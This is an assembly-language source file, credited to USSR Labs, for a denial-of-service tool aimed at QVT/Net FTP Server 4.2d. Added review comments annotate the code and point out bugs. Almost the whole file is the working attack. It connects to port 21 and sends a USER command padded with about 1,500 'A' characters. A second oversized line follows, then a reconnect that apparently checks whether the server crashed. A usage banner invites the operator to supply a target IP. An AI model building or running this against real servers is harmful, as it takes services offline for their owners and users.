
;============================================================================
; Denial-of-service test for QVT/Net FTP Server version 4.2d (Win98/NT)    ==
;                                                                          ==
; Source by: USSR Labs                                                     ==
; www.ussrback.com                                                         ==
;                                                                          ==
;============================================================================
  8.  
; Assembler setup: TASM/MASM syntax (Intel operand order), 32-bit flat
; model, Win32 stdcall ABI (the callee pops its arguments, which is why no
; stack adjustment follows any API call below).
.386p                                   ; 386 instruction set, privileged instructions allowed
locals                                  ; TASM: enable @@-style local labels
jumps                                   ; TASM: auto-widen conditional jumps that are out of short range
.model flat, stdcall
 
; Win32 / Winsock 1.1 imports, resolved at link time.
extrn   GetCommandLineA:PROC
extrn   GetStdHandle:PROC
extrn   WriteConsoleA:PROC              ; not called directly in the visible code; presumably used by the Write_Console macro from code.inc
extrn   ExitProcess:PROC
extrn   WSAStartup:PROC
extrn   connect:PROC
extrn   send:PROC
extrn   recv:PROC
extrn   WSACleanup:PROC
extrn   htons:PROC
extrn   socket:PROC
extrn   inet_addr:PROC
extrn   closesocket:PROC
Extrn    GetModuleHandleA          : PROC   ; not referenced in the visible code (may be used by code.inc)
Extrn    GetProcAddress              : PROC   ; not referenced in the visible code (may be used by code.inc)
Extrn    lstrlenA              : PROC
  30.  
  31. .data
  32.  
  33.  
; First line sent to the FTP control connection: a USER command whose
; argument is a long run of 'A' (24 DB lines), terminated by CRLF.  The
; length is taken from the assembler position counter right after the
; last DB, so these lines must stay contiguous; sploit_code_length is the
; byte count handed to send.  This oversized argument is the
; denial-of-service trigger described in the Copy banner.
sploit_code label byte
        DB 'USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',13,10
 
sploit_code_length   equ     $-sploit_code   ; bytes from sploit_code to here (CRLF included)
  61.  
; Second line sent after the server answers the first one: the same kind
; of long 'A' run (23 DB lines) plus CRLF, but with no command keyword in
; front of it.  As with sploit_code, the length is position-counter based,
; so keep the DB lines contiguous.
sploit_code2 label byte
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',13,10
 
sploit2_code_length   equ     $-sploit_code2  ; bytes from sploit_code2 to here (CRLF included)
  88.  
; Usage banner, shown when no host argument is found on the command line.
; The string is NUL-terminated and Copyl is measured past that NUL, so the
; terminator byte is written to the console as well.  The example address
; contains an out-of-range octet (488); it is a runtime string and is left
; untouched here.
Copy            db "QVT/Net FTP Server version 4.2d Win98/NT Denial of Service", 13, 10
                db "by: Ussr",13,10
                db "for source code or binary go to: http://www.ussrback.com/qvtfs42/",13,10,13,10
                db "Usage: dieqvtftp HostIp", 13, 10
                db "Example: dieqvtftp 205.488.47.6",13,10,0
Copyl        equ $-Copy                  ; length including the trailing NUL
  95.  
; Field sizes for the WSADATA mirror below (each buffer gets +1 for a NUL).
wsadescription_len equ 256
wsasys_status_len equ 128
  98.  
; Local mirror of the Winsock WSADATA structure that WSAStartup fills in.
; Only its address is used (push offset wsadata); no field is read back.
WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)   ; 257 bytes
szSystemStatus db wsasys_status_len+1 dup (?)   ; 129 bytes
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?                       ; NOTE(review): lpVendorInfo is a 4-byte pointer in the Win32 WSADATA; with dw the
                                        ; struct is shorter than what WSAStartup writes, so the tail can spill into the
                                        ; bytes that follow (sin, whose fields are rewritten before use) -- confirm
WSAdata ends
  108.  
; Winsock sockaddr_in (16 bytes): family, port (network order), IPv4
; address, 8 bytes of padding.  Passed to connect with `size sin`.
sockaddr_in struct
sin_family dw ?
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup (0)
sockaddr_in ends
  115.  
; Global state.
wsadata WSAdata                         ; filled by WSAStartup, never read
sin sockaddr_in                         ; target: host from the command line, port 21
sock dd ?                               ; SOCKET handle; reused for the second connection
numbase dd 10                           ; not referenced in the visible code
hostParamether db 256 dup (?)           ; host text copied from the command line by rep movsb;
                                        ; the copy is not bounded to 256 bytes and does not append a NUL
                                        ; (relies on the uninitialised tail being zero -- presumably the
                                        ; linker zero-fills it; confirm)
buffer dd 1000 dup (0)                  ; 4000 bytes; recv reads at most 1000, so the zero tail
                                        ; keeps the data NUL-terminated for lstrlenA
buffer2 dd 1000 dup (0)                 ; same, for the reply to the first send
buffer3 dd 1000 dup (0)                 ; not referenced in the visible code
  124.  
; Console messages with their lengths (computed via the position counter,
; so each `...l` equ must stay directly after its string).
i_cant_connect    db 'fata: sorry i can',27h,'t connect to this host!',13,10   ; "fata" is in the runtime text as written; 27h is the apostrophe
i_cant_connectl equ $-i_cant_connect
 
SendingExploit  db 'Sending D.O.S code....',13,10
SendingExploitl equ $-SendingExploit
 
include code.inc                        ; not visible here; presumably defines the Write_Console macro used below
 
cchWritten dd 0                         ; byte count written by the console output (presumably filled by Write_Console)
ConHandle dd 0                          ; STD_OUTPUT_HANDLE from GetStdHandle, set at start
  135.  
.code
;-----------------------------------------------------------------------
; start: program entry point.
; Input:  host IP taken from the process command line (text after the
;         first space), via GetCommandLineA.
; Flow:   parse host -> WSAStartup -> socket/connect to port 21 -> recv
;         greeting -> send sploit_code -> recv reply -> send sploit_code2
;         -> close -> fresh WSAStartup/socket/connect (outcome unreported)
;         -> close -> ExitProcess(0).  No API return value is checked
;         except the first connect.
; ABI:    Win32 stdcall; callee pops arguments.  The program never
;         returns, so stack balance is not restored anywhere.
; Regs:   edi/esi/ecx drive the scasb/movsb string ops; eax carries API
;         results; ebx/edx/ebp are zeroed and otherwise unused here.
;-----------------------------------------------------------------------
start:
    xor    eax,eax                     ; clear all GPRs before use
    xor    ebx,ebx
    xor    edx,edx
    xor    ecx,ecx
    xor    esi,esi
    xor    edi,edi
    xor    ebp,ebp
    Push    -11                        ; STD_OUTPUT_HANDLE
    Call    GetStdHandle
    Mov    [ConHandle],EAX             ; kept for the Write_Console macro (code.inc, not visible)
    call    GetCommandLineA
    mov    edi, eax                    ; edi -> full command line (program name + arguments)
    mov    ecx, -1
    xor    al, al
    push    edi
    repnz    scasb                     ; scan to the terminating NUL
    not    ecx                         ; ecx = strlen(cmdline) + 1 (NUL counted)
    pop    edi
    mov    al, 20h
    repnz    scasb                     ; scan to the first ' '; edi -> byte after it
    dec    ecx                         ; ecx = bytes after the space, NUL excluded
                                       ; NOTE(review): if no space exists, scasb exhausts ecx to 0 and
                                       ; dec leaves -1; esi then points past the NUL and, unless that
                                       ; byte is 0, the rep movsb at `continue` runs unbounded
    mov    esi, edi
    cmp    byte ptr [esi],0            ; nothing after the space -> usage banner
    je    no_command_line
    cmp    byte ptr [esi],20           ; NOTE(review): 20 here is decimal (14h), not 20h; this does not
                                       ; match a second space -- looks like a hex/decimal slip, confirm
    je    incrementa1
continue:
        lea     edi, hostParamether
    rep    movsb                       ; copy the argument; no length check against the 256-byte
                                       ; hostParamether and no NUL appended (see data section)
    push    offset wsadata
    push    0101h                      ; Winsock 1.1
    call    WSAStartup                 ; result unchecked
    xor    eax, eax
    push    eax                        ; protocol = 0
    inc    eax
    push    eax                        ; type = 1 (SOCK_STREAM)
    inc    eax
    push    eax                        ; af = 2 (AF_INET)
    call    socket
    mov    sock, eax                   ; INVALID_SOCKET not checked
    mov    sin.sin_family, 2           ; AF_INET
        mov     eax,21d                         ; port
    push    eax
    call    htons
 
    mov    sin.sin_port, ax            ; port in network byte order
        push    offset hostParamether
    call    inet_addr                  ; dotted-quad text -> address; INADDR_NONE not checked
 
    mov    sin.sin_addr, eax
    push    size sin
    push    offset sin
    push    sock
    call    connect
    or    eax, eax                     ; 0 = connected, SOCKET_ERROR otherwise
    jz    connectionworking
    Write_Console <offset i_cant_connect > <i_cant_connectl >
    jmp    the_end
incrementa1:
    inc   si                           ; NOTE(review): 16-bit increment of esi (partial register, wraps
                                       ; at a 64K boundary); ecx is not decremented, so the copy at
                                       ; `continue` moves one extra byte (the NUL)
    jmp   continue
connectionworking:
    xor    eax, eax
    push    eax                        ; flags = 0
    push    1000                       ; len; buffer is 4000 bytes, so a NUL always follows the data
    push    offset buffer
    push    sock
    call    recv                       ; server greeting; byte count ignored
        push    offset buffer
    call    lstrlenA                   ; eax = greeting length (0 if recv failed, buffer stays zeroed)
    Write_Console <offset buffer  > <eax >
        Write_Console <offset SendingExploit > <SendingExploitl >
    call    lstrlenA                   ; NOTE(review): no argument pushed -- lstrlenA pops a stale dword
                                       ; (presumably the entry-time return address) as its string and
                                       ; leaves esp 4 bytes higher; result unused. Only harmless because
                                       ; ExitProcess never returns
        xor     eax, eax
    push    eax                        ; flags = 0
    push    sploit_code_length
    push    offset sploit_code
    push    sock
    call    send                       ; first line (oversized USER); result unchecked
        xor     eax, eax
        push    eax                    ; flags = 0
        push    1000
        push    offset buffer2
        push    sock
        call    recv                   ; server reply to the first line; byte count ignored
        push    offset buffer2
        call    lstrlenA
        Write_Console <offset buffer2 > <eax >
        xor     eax, eax
    push    eax                        ; flags = 0
        push    sploit2_code_length
        push    offset sploit_code2
    push    sock
    call    send                       ; second line; result unchecked
        Write_Console <offset SendingExploit > <SendingExploitl >
 
        push    sock
    call    closesocket
    call    WSACleanup
 
    push    offset wsadata             ; second Winsock session: one more connect to the same target
    push    0101h
    call    WSAStartup
 
    xor    eax, eax
    push    eax
    inc    eax
    push    eax
    inc    eax
    push    eax
    call    socket
    mov    sock, eax
    mov    sin.sin_family, 2
        mov     eax,21d                         ; port
    push    eax
    call    htons
 
    mov    sin.sin_port, ax
        push    offset hostParamether
    call    inet_addr                  ; unlike the first pass, eax is not stored into sin.sin_addr;
                                       ; sin still holds the address from the first pass, so the
                                       ; target is unchanged
 
        push    size sin
    push    offset sin
    push    sock
    call    connect                    ; outcome neither checked nor reported -- presumably a
                                       ; liveness probe after the two sends; falls through to the_end
 
the_end:
    push    sock
    call    closesocket
    call    WSACleanup
final_exit:
    push    0                          ; exit code 0 on every path, including connect failure
    call    ExitProcess
no_command_line:
    Write_Console <offset Copy > <Copyl >
    jmp   final_exit
end start
  275.  
  276.